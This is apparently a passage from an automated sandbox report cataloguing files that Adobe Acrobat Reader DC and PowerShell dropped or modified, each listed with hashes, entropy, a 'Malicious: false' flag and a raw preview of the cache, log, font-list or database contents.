Preview:	0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js .i../)/....."#.D....xJ.A8.../...;.\\o....1..........+..A..Eo...................A..Eo......-.D.........0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js .j1m./)/....."#.D....xJ.A8.../...;.\\o....1..........+..A..Eo...................A..Eo......&$..........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.619388945816306
Encrypted:	false
SSDEEP:	12:nRrROk/VgmB/RrROk/VY9aomy91RrROk/VeJ9bom4i:nPJ/XB/PJ/Ly/PJ/o9h
MD5:	5D5456F920BD426A34B9B57FA2E62A23
SHA1:	854D4972E8C160F50AB58F69FBD098BB45DA064E
SHA-256:	64F3D10DE82F7743E4EBE75F3986433811BF261B87B731A720EF535EFF68CD93
SHA-512:	ABD740725EC3744B4A9D33E974D576EB84E7459A4539AB3F1EF0964EF448B37FB0996F77A6D140D56FA1AAC3D641EECB33038852B13DD1EDDBBE7D058E133010
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..c./)/....."#.D.iB.xJ.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo......I.:j........0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..sj./)/....."#.D<...xJ.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo........./........0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ...~./)/....."#.D8...xJ.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo.................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	420
Entropy (8bit):	5.57318239409961
Encrypted:	false
SSDEEP:	6:mZ/lXYOFLvEWdccAWuQSAdm9741TK6tD2Z/lXYOFLvEWdccAWuJYv93Adm9741T+:qxRcnAdu7E56xRcUpAdu7E0
MD5:	211D103DD4EB8B08057F5BAACF0DD641
SHA1:	EB9A0D629FF31E889E3B6399014143F3CB9B56B4
SHA-256:	8CFDF9C078B4FD725246E798F7E2A0406EDA183C8141B1043386CAD28A4F33AB
SHA-512:	BCE00F70E98D21A93255F59112D12AE228419AA21C07AD76D2A16913155FEF88AF58A649BB832E3B0F96FDC7471C7FABE8DD58539711AAC3854896F7C6178618
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js .1.../)/....."#.D\.6.xJ.A...U...I.>P...X...x..0U.~;m.x.k.A..Eo...................A..Eo.......FA.........0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ..Dv./)/....."#.D....xJ.A...U...I.>P...X...x..0U.~;m.x.k.A..Eo...................A..Eo.......C..........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.599875059204717
Encrypted:	false
SSDEEP:	6:mMOYOFLvEWdwAPVujO7kJn1TK6tXXMMOYOFLvEWdwAPVuxA5Jn1TK6t:2R1G5LJMR1PL
MD5:	FF582498007572F32789C8A275D9A0EF
SHA1:	38D429EA05ABF71A916ECAB01CA7E0CB56E3E10B
SHA-256:	BD7C7057258A7C61C312E03369B6546CDA3899E1DCAE0193F8BCD728C88CB500
SHA-512:	0EFB2CBD7733CA8500EC36CB78EADB5DDAD3B6AA914776A0EC05ADE1D5FE2D21809432C375A5951C72B36F7B3FC191EE41CBFEB60D8CBEA2D443E4FB55A08CAC
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..../)/....."#.D)...xJ.A.....k....F..D..O.n;[.1m.....=..A..Eo...................A..Eo.........a........0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ...l./)/....."#.D....xJ.A.....k....F..D..O.n;[.1m.....=..A..Eo...................A..Eo.......u.Q........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	424
Entropy (8bit):	5.651920513331139
Encrypted:	false
SSDEEP:	6:m3PXYOFLvEWdBJvYQpTiJVdzhcsBXIh1TK6tW3PXYOFLvEWdBJvYQtLRyzhcsBXY:mxRBJQ6TidDB00xRBJQaLRyDB0Fl
MD5:	854C027273CC8CE6284A940E9E0E5B07
SHA1:	B07E3D306E7C9FE66E557D38F76CA94E7A21E13A
SHA-256:	CB9F0C7B9FB45FB06F5D7F5BDB7E979916F174E46F839C41C2F91D9AA1FC326C
SHA-512:	14CEF704F6E66F17A2E696837ABD2D2CCFA1CAE672F0C3B7EB9F873FBD6F4C56958019AB67E19A7694A2D1A439E2D1FB2B7B041C5327AF58226E2649C1C03346
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ...H./)/....."#.D..3.xJ.A...k..`..N3.... ..d..$[.....{.A..Eo...................A..Eo......^.u.........0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ...}./)/....."#.D....xJ.A...k..`..N3.... ..d..$[.....{.A..Eo...................A..Eo..................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	684
Entropy (8bit):	5.612403440942444
Encrypted:	false
SSDEEP:	12:3RrROk/sYHcIFRrROk/seVOHchRrROk/sVK0WHc:3PJ/D8IFPJ/9VO8hPJ//0W8
MD5:	C2575D3F321543420D35E67E5C1287C9
SHA1:	1D3EF323ED14AC3D940F66DBFC052DB8DAE4127B
SHA-256:	F57337F19BFE474472D556DF2FCCF111363966EE9C798BD5E53B4BADCA108C8B
SHA-512:	1D6B040691EDFE84D94F5773E775E2DFCEB995FD5F9C6600DFE4573FF994BE9C188E273F898B9029DF30D0433980359ED4462DF714CF93A66C0CE16F9653FC1B
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..e./)/....."#.Dr.B.xJ.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo......Y..........0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..uj./)/....."#.D.l..xJ.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo.......f..........0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ...~./)/....."#.D.J..xJ.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo.........\........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	2064
Entropy (8bit):	5.220674819831919
Encrypted:	false
SSDEEP:	24:Mfg1zZFufGMisp6r6C9QP/5aUUnkcRMVDw++fnmUWquf:h1zZ4+dsp665aUUnb4Dw++vLfuf
MD5:	2B96D3223CA2D957464A9C7DE402452A
SHA1:	507BD993310D1E693EB56C76369E4F2276D9EB9E
SHA-256:	20768DB50F38E7328392A6C86696D3966A826E9D74F01AE4E8A3CE3DEDEFB7F0
SHA-512:	8BB6721B57A284238E8A6C573E24E7020DACDCBE4736154AD904C8DDB87900EDB1C701C33648BB34A2F07429655E55BDD34FC7FCE19A12EFE16F40F5B6ECA1CD
Malicious:	false
Reputation:	unknown
Preview:	....h...oy retne....'........'............;.y~A..z.B_./..............z.B_./..............oB.8.B_./............#...(...A_./.............k7A..z.B_./.............D.4..z.B_./..........[.i..%..z.B_./.........<...W..J.8.B_./.........,+..._.#.z.B_./..........J..j....z.B_./...........6<\|....8.B_./.........A?.2:...z.B_./..........+.{..'.z.B_./.........)....J:.z.B_./...........2q.....z.B_./...........P....V.z.B_./.........+.U.!..V.z.B_./............P[. q.z.B_./.........!...0.o.z.B_./..........u\]..q.z.B_./.................z.B_./................z.B_./..........o..k...z.B_./.........^.~..z..z.B_./.............o..z.B_./.........Gy.'.h..z.B_./.........F..=z;..z.B_./...........3....z.B_./..........v...q...8.B_./..........C..M.....A_./...........a.....8.B_./..........~.,.4>..z.B_./..........&.S.....z.B_./..........@..x..z.B_./.........=....m...z.B_./..........;/....z.B_./..............q..z.B_./............MV3...z.B_./.........:..N.A...z.B_./............B_./.0...b.S.oy retne

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	2064
Entropy (8bit):	5.220674819831919
Encrypted:	false
SSDEEP:	24:Mfg1zZFufGMisp6r6C9QP/5aUUnkcRMVDw++fnmUWquf:h1zZ4+dsp665aUUnb4Dw++vLfuf
MD5:	2B96D3223CA2D957464A9C7DE402452A
SHA1:	507BD993310D1E693EB56C76369E4F2276D9EB9E
SHA-256:	20768DB50F38E7328392A6C86696D3966A826E9D74F01AE4E8A3CE3DEDEFB7F0
SHA-512:	8BB6721B57A284238E8A6C573E24E7020DACDCBE4736154AD904C8DDB87900EDB1C701C33648BB34A2F07429655E55BDD34FC7FCE19A12EFE16F40F5B6ECA1CD
Malicious:	false
Reputation:	unknown
Preview:	....h...oy retne....'........'............;.y~A..z.B_./..............z.B_./..............oB.8.B_./............#...(...A_./.............k7A..z.B_./.............D.4..z.B_./..........[.i..%..z.B_./.........<...W..J.8.B_./.........,+..._.#.z.B_./..........J..j....z.B_./...........6<\|....8.B_./.........A?.2:...z.B_./..........+.{..'.z.B_./.........)....J:.z.B_./...........2q.....z.B_./...........P....V.z.B_./.........+.U.!..V.z.B_./............P[. q.z.B_./.........!...0.o.z.B_./..........u\]..q.z.B_./.................z.B_./................z.B_./..........o..k...z.B_./.........^.~..z..z.B_./.............o..z.B_./.........Gy.'.h..z.B_./.........F..=z;..z.B_./...........3....z.B_./..........v...q...8.B_./..........C..M.....A_./...........a.....8.B_./..........~.,.4>..z.B_./..........&.S.....z.B_./..........@..x..z.B_./.........=....m...z.B_./..........;/....z.B_./..............q..z.B_./............MV3...z.B_./.........:..N.A...z.B_./............B_./.0...b.S.oy retne

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_05349744be1ad4ad_0_1 (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	615
Entropy (8bit):	5.687003710814478
Encrypted:	false
SSDEEP:	12:vDRM9OeZiEXvDRM9jZdZZiEhDRM9L9dZZiEzl:7XELfE1I4Ez
MD5:	44E6145D5BE88E629D9603D747E088E1
SHA1:	2331C14D5CEF32B0566F22D1AF60A713F61E8124
SHA-256:	3ECCBBE4798A66962CD9E427B11E312E4F2AE9952360A303999C942FA3CF035F
SHA-512:	50584B3AFB97E86F5DB6F99E5506E4D2570966828F2E7095D38658091D5A535F7EC51ECE9534B25E09A23B7E1B55E7D8B565E89CAB9F3D33F19308A352F8AECA
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .e.H./)/....."#.D.>.xJ.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo.........x........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ...}./)/....."#.D....xJ.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo.......X5.........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ..../)/....."#.D!.2.xJ.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo......k6.S........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_56c4cd218555ae2b_0_1 (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	732
Entropy (8bit):	5.628795327457641
Encrypted:	false
SSDEEP:	12:URVFAFjVFAFqGwSeKaTLnYZRVFAFjVFAFKXwSeKaTLne8RVFAFjVFAFbwSeKaTLR:UB4v4qGwzXLnkB4v4KXwzXLntB4v4bwf
MD5:	610C433BE622471A1BE74F3A4DD13D83
SHA1:	BD255DA35EF9DD5F5366F27F433A2C74AA740DD3
SHA-256:	CA5F7EFB415D4FBC29780DB83B7E4C1469845629DD644C93B0AAA75642CE420C
SHA-512:	BF19F441FE0CFFB52F5A4A1B219DEBA03CB4FBE179406162B4386E81E7C053C495928E49AC3AA29ACFA3044798B7821FE73D95FDC65260F5898642A54713748F
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js .&0G./)/....."#.D..:.xJ.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo..................0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ...z./)/....."#.Ds...xJ.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo......s,.1........0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..../)/....."#.D.:/.xJ.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo.......@.'........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_f0cf6dfa8a1afa3d_0_1 (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	624
Entropy (8bit):	5.640928735007842
Encrypted:	false
SSDEEP:	6:mkqYOFLvEWd8CAd9Qj/JlmuA424r1TK6tnMkqYOFLvEWd8CAd9Q8K1suA424r1Tk:+RQgJlZrn18RQW1PrnufRQiVPrn3T
MD5:	69E5DC73862A926EC9E055813E1823D5
SHA1:	1ED32049563171BA3E65FAEF0C0662AC169B5FBC
SHA-256:	9E67066E262A0CED058BE029A1EA9783024338775A26C8481E263EC9A3796BCC
SHA-512:	2A9FAE88D12EACD15A7137529A10CE7866D4E5D5C42284A7EEFE2ABDF0DA4DD61D4BECBD62FCB6ECA88C570CA4D65FD7791F8F144650BC0625706783E535BFA1
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...I./)/....."#.D..M.xJ.A#..@..k(v.8g..5.~_....]Pj...6.A..Eo...................A..Eo......G..#........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...~./)/....."#.D....xJ.A#..@..k(v.8g..5.~_....]Pj...6.A..Eo...................A..Eo.......7`.........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .f../)/....."#.Dx.4.xJ.A#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo...................A..Eo..................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.155906647404193
Encrypted:	false
SSDEEP:	6:mkMbBX9+q2PWXp+N2nKuAl9OmbnIFUtpXMCJZmwPXMTLVkwOWXp+N2nKuAl9Omb5:nsR4vaHAahFUtpXH/PXkR5fHAaSJ
MD5:	F86F985F63878979C2B3E7F9D2AC8650
SHA1:	C7FC59FE3923FC4B3C2BBBC641087D2E5C5FA425
SHA-256:	0D3A3DF549C990441456C91572B313ABE6A680A5A0A16A0E84215E12EDC14145
SHA-512:	9E9BB6B2CB89DE03EE767CDF63E35CE7B86DFB0BE1C4D21B113A0312FD5D9F50867C190AD8ECE8D15204988252493A2F5938C627424420B9531760FF86048E05
Malicious:	false
Reputation:	unknown
Preview:	2021/08/28-00:05:40.150 c58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/08/28-00:05:40.157 c58 Recovering log #3.2021/08/28-00:05:40.158 c58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.155906647404193
Encrypted:	false
SSDEEP:	6:mkMbBX9+q2PWXp+N2nKuAl9OmbnIFUtpXMCJZmwPXMTLVkwOWXp+N2nKuAl9Omb5:nsR4vaHAahFUtpXH/PXkR5fHAaSJ
MD5:	F86F985F63878979C2B3E7F9D2AC8650
SHA1:	C7FC59FE3923FC4B3C2BBBC641087D2E5C5FA425
SHA-256:	0D3A3DF549C990441456C91572B313ABE6A680A5A0A16A0E84215E12EDC14145
SHA-512:	9E9BB6B2CB89DE03EE767CDF63E35CE7B86DFB0BE1C4D21B113A0312FD5D9F50867C190AD8ECE8D15204988252493A2F5938C627424420B9531760FF86048E05
Malicious:	false
Reputation:	unknown
Preview:	2021/08/28-00:05:40.150 c58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/08/28-00:05:40.157 c58 Recovering log #3.2021/08/28-00:05:40.158 c58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.009425135848739542
Encrypted:	false
SSDEEP:	48:nuWiCuWi9uWhC9uWhC9uWhC9uWhCAuWhCrNuWhCr+smWhCrDsmWhCDo:uHesssjPAPQPvno
MD5:	C6F1663B22E21B131D3CC237876D10AB
SHA1:	E916C13FA862DAD1E982FA14A856DD059C6D7ACE
SHA-256:	B09A56561B10C0A700A0FA83A8FDB0FDA1383C1753572001C923D7F7C0E419E8
SHA-512:	27669F8C1069DA4F571513E9F7181F86B966BBCAD80E4155DD67F1274496A7CD3B0E7FCE48C36B08C94EC2FF879F911CFB0D4D28F97C125FECDCF3B49F554930
Malicious:	false
Reputation:	unknown
Preview:	VLnk.....?.......Tq.>..j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-210828083133Z-409.bmp Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PC bitmap, Windows 3.x format, 117 x -152 x 32
Category:	dropped
Size (bytes):	71190
Entropy (8bit):	3.23538305871218
Encrypted:	false
SSDEEP:	384:2Sk6OAOEDyoMJLCEwlMDNVRXwII7c7JOhXGFIgCd1sDuRvYfEU0NsgDW9ATCj8wq:YF6DSwlI5R7JEx3sKvjWu3xOfePn
MD5:	867476F332723EC610B15F7D07FED484
SHA1:	EF619DB72371B0BDCB7D06338B2FAEFFE9E39DB4
SHA-256:	48E1744D768D4B39B88B829D3D1E891A1619B49FA968AB7BC5C4471D95DD23B3
SHA-512:	35C989E10870830F1DE7C16D8D310ABA56F288FF75EA70A6A3612BACFDCDF94D8B5D2E06FC2D0D9E79D85FD709ABB26DCFFA70FE48BABFE20BF70B16A755A16A
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3024000
Category:	modified
Size (bytes):	32768
Entropy (8bit):	3.3881235415860487
Encrypted:	false
SSDEEP:	96:iR49IVXEBodRBkQjtOhFVCsL49IVXEBodRBkRcNjtOhAVCs749IVXEBodRBklcNp:iGedRBPedRBwedRBqedRBp
MD5:	A2B469467DB99BDD9C2C8485AD6AE859
SHA1:	B71976B7C330C071BEB5D3E44DF97AA3BAD7AFB4
SHA-256:	58A91986BF7E20453CBF056C20A3A1ECA9EA47A94E9E235CD976C20BE2DECD58
SHA-512:	F587C7376568E6AFCC4EC9BE73B84A985DD7D3022939D2EC111606CF1BBA979F53625F46007D2830E8E897318A0A47494D98BB1BA442FD024B7F5E236D314A27
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	34928
Entropy (8bit):	3.201526510955175
Encrypted:	false
SSDEEP:	96:V7OhFVCPf949IVXEBodRBkJjtOhFVCsvLR49IVXEBodRBk8cNjtOhAVCsHd49IVK:VriedRBPLGedRB6CedRBwyedRB5
MD5:	C102B8786DC439B486A054E680B4C17B
SHA1:	375187EC82CCA131A4DA9F5A2EB119001EA68862
SHA-256:	9F0977524657CC5AF6C00D60F52E9C5AB8D94275147ED742B59104AD2969B591
SHA-512:	ADC0DFF23B0019FAF92D8F949A0F1CC87D5A53D0D05807226ED2D1D6642C76D20B5A6B10F167667A746794B66BE09DB5CC441E33FFDAEABDC4A7AE91CDCFBDA7
Malicious:	false
Reputation:	unknown
Preview:	...............j...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X...h...y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.1488 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	157443
Entropy (8bit):	5.172039478677
Encrypted:	false
SSDEEP:	1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
MD5:	A2C6972A1A9506ACE991068D7AD37098
SHA1:	BF4D2684587CF034BCFC6F74CED551F9E5316440
SHA-256:	0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
SHA-512:	4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
Malicious:	false
Reputation:	unknown
Preview:	%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy) Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	157443
Entropy (8bit):	5.172039478677
Encrypted:	false
SSDEEP:	1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
MD5:	A2C6972A1A9506ACE991068D7AD37098
SHA1:	BF4D2684587CF034BCFC6F74CED551F9E5316440
SHA-256:	0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
SHA-512:	4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
Malicious:	false
Reputation:	unknown
Preview:	%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	192:m9smd3YrKkGdcU6CkVsm5emla9sm5ib4D4O4dVsm5emdjxoeRjp5Kib4n2Ca6pZS:vSib4D4O4dvEib42opbjvwRjdvRnrkjm
MD5:	966A0C53A2B0C5E66F05BEA6076A435C
SHA1:	62607F6C2865D7D460D4CD82F6CBF086E63C3254
SHA-256:	B59E1435A2B2D839050068229A0616A7E983F999EA0783914381CF067BCD7AB0
SHA-512:	FC930C84792ABB805FA07E1096845CE7A3E827CFD2ED8DA8E6C35A48F2F071267899246AD0537F8F66E3C55E87FB9D792C4FDC38845C5615EC6CD7CC46BCA74C
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

